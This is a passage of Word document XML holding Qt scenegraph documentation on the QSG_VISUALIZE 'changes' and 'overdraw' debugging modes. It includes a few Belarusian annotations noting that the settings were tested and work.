        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE5C7D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="006D5EFA" w:rsidRPr="006D5EFA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono" w:hint="eastAsia"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>У</w:t>
      </w:r>
      <w:r w:rsidR="006D5EFA" w:rsidRPr="006D5EFA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">сё працуе… цікава, а чаму тады </w:t>
      </w:r>
      <w:r w:rsidR="006D5EFA" w:rsidRPr="006D5EFA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML</w:t>
      </w:r>
      <w:r w:rsidR="006D5EFA" w:rsidRPr="006D5EFA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>2_</w:t>
      </w:r>
      <w:r w:rsidR="006D5EFA" w:rsidRPr="006D5EFA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IMPORT</w:t>
      </w:r>
      <w:r w:rsidR="006D5EFA" w:rsidRPr="006D5EFA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="006D5EFA" w:rsidRPr="006D5EFA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PATH</w:t>
      </w:r>
      <w:r w:rsidR="006D5EFA" w:rsidRPr="006D5EFA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006D5EFA" w:rsidRPr="006D5EFA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>не працуе.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE5C7D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="00DE5C7D" w:rsidRDefault="00815754" w:rsidP="00DE5C7D">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1755" w:name="visualizing-changes"/>
      <w:bookmarkStart w:id="1756" w:name="_Toc483000910"/>
      <w:bookmarkStart w:id="1757" w:name="_Toc483003901"/>
      <w:bookmarkStart w:id="1758" w:name="_Toc483604254"/>
      <w:bookmarkStart w:id="1759" w:name="_Toc483605474"/>
      <w:bookmarkEnd w:id="1755"/>
      <w:r w:rsidRPr="00DE5C7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Visualizing Changes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1756"/>
      <w:bookmarkEnd w:id="1757"/>
      <w:bookmarkEnd w:id="1758"/>
      <w:bookmarkEnd w:id="1759"/>
    </w:p>
    <w:p w:rsid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Setting</w:t>
      </w:r>
      <w:r w:rsidR="006D5EFA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006D5EFA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QSG_VISUALIZE</w:t>
      </w:r>
      <w:r w:rsidR="006D5EFA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="006D5EFA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006D5EFA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>changes</w:t>
      </w:r>
      <w:r w:rsidR="006D5EFA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>visualizes changes in the renderer. Changes in the scenegraph are visualized with a flashing overlay of a random color. Changes on a primitive are visualized with a solid color, while changes in an ancestor, such as matrix or opacity changes, are visualized with a pattern.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D5EFA" w:rsidRPr="00DE5C7D" w:rsidRDefault="00DE5C7D" w:rsidP="00815754">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="006D5EFA" w:rsidRPr="006D5EFA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Праверыў. Працуе цудоўна.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="00815754" w:rsidRDefault="00815754" w:rsidP="00DE5C7D">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1760" w:name="visualizing-overdraw"/>
      <w:bookmarkStart w:id="1761" w:name="_Toc483000911"/>
      <w:bookmarkStart w:id="1762" w:name="_Toc483003902"/>
      <w:bookmarkStart w:id="1763" w:name="_Toc483604255"/>
      <w:bookmarkStart w:id="1764" w:name="_Toc483605475"/>
      <w:bookmarkEnd w:id="1760"/>
      <w:r w:rsidRPr="00DE5C7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Visualizing Overdraw</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1761"/>
      <w:bookmarkEnd w:id="1762"/>
      <w:bookmarkEnd w:id="1763"/>
      <w:bookmarkEnd w:id="1764"/>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="00815754" w:rsidRDefault="00815754" w:rsidP="00815754">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Setting</w:t>
      </w:r>
      <w:r w:rsidR="006D5EFA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QSG_VISUALIZE</w:t>
      </w:r>
      <w:r w:rsidR="006D5EFA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="006D5EFA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>overdraw</w:t>
      </w:r>
      <w:r w:rsidR="00D94480">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">visualizes overdraw in the renderer. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Visualize all items in 3D to highlight overdraws</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This mode can also be used to detect geometry outside the viewport to some extent</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Opaque items are rendered with a green tint, while translucent items are rendered with a red tint. The bounding box for the viewport is rendered in blue. Opaque content is easier for the scenegraph to process and is usually faster to render.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="00815754" w:rsidRDefault="00815754" w:rsidP="00815754">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note that the root rectangle in the code above is superfluous as the window is also white, so drawing the rectangle is a waste of resources in this case. Changing it to an Item can give a slight performance boost.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="00815754" w:rsidRDefault="00815754" w:rsidP="00815754">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/visualize-overdraw-1.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00815754">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"http://doc.qt.io/qt-5/images/visualize-overdraw-1.png"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"http://doc.qt.io/qt-5/images/visualize-overdraw-1.png"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"http://doc.qt.io/qt-5/images/visualize-overdraw-1.png"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"http://doc.qt.io/qt-5/images/visualize-overdraw-1.png"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"http://doc.qt.io/qt-5/images/visualize-overdraw-1.png"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"http://doc.qt.io/qt-5/images/visualize-overdraw-1.png"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"http://doc.qt.io/qt-5/images/visualize-overdraw-1.png"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"http://doc.qt.io/qt-5/images/visualize-overdraw-1.png"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"http://doc.qt.io/qt-5/images/visualize-overdraw-1.png"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"http://doc.qt.io/qt-5/images/visualize-overdraw-1.png"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"http://doc.qt.io/qt-5/images/visualize-overdraw-1.png"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"http://doc.qt.io/qt-5/images/visualize-overdraw-1.png"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"http://doc.qt.io/qt-5/images/visualize-overdraw-1.png"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"http://doc.qt.io/qt-5/images/visualize-overdraw-1.png"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"http://doc.qt.io/qt-5/images/visualize-overdraw-1.png"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"http://doc.qt.io/qt-5/images/visualize-overdraw-1.png"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"http://doc.qt.io/qt-5/images/visualize-overdraw-1.png"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"http://doc.qt.io/qt-5/images/visualize-overdraw-1.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1049" type="#_x0000_t75" alt="&quot;overdraw-1&quot;" style="width:150.9pt;height:108.3pt">
            <v:imagedata r:id="rId2100" r:href="rId2101"/>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Pr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="00815754" w:rsidRDefault="00815754" w:rsidP="00815754">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/visualize-overdraw-2.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="008E2997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008E2997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/visualize-overdraw-2.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="008E2997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00450174">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00450174">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/visualize-overdraw-2.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00450174">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"http://doc.qt.io/qt-5/images/visualize-overdraw-2.png"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"http://doc.qt.io/qt-5/images/visualize-overdraw-2.png"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"http://doc.qt.io/qt-5/images/visualize-overdraw-2.png"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"http://doc.qt.io/qt-5/images/visualize-overdraw-2.png"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"http://doc.qt.io/qt-5/images/visualize-overdraw-2.png"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"http://doc.qt.io/qt-5/images/visualize-overdraw-2.png"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"http://doc.qt.io/qt-5/images/visualize-overdraw-2.png"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"http://doc.qt.io/qt-5/images/visualize-overdraw-2.png"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"http://doc.qt.io/qt-5/images/visualize-overdraw-2.png"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"http://doc.qt.io/qt-5/images/visualize-overdraw-2.png"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"http://doc.qt.io/qt-5/images/visualize-overdraw-2.png"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"http://doc.qt.io/qt-5/images/visualize-overdraw-2.png"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"http://doc.qt.io/qt-5/images/visualize-overdraw-2.png"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"http://doc.qt.io/qt-5/images/visualize-overdraw-2.png"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"http://doc.qt.io/qt-5/images/visualize-overdraw-2.png"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"http://doc.qt.io/qt-5/images/visualize-overdraw-2.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1050" type="#_x0000_t75" alt="&quot;overdraw-2&quot;" style="width:150.9pt;height:108.3pt">
            <v:imagedata r:id="rId2102" r:href="rId2103"/>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00450174">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="008E2997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="00D94480" w:rsidRDefault="00815754" w:rsidP="00815754">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QSG_VISUALIZE=overdraw</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302D13" w:rsidRPr="00D94480" w:rsidRDefault="00D94480" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
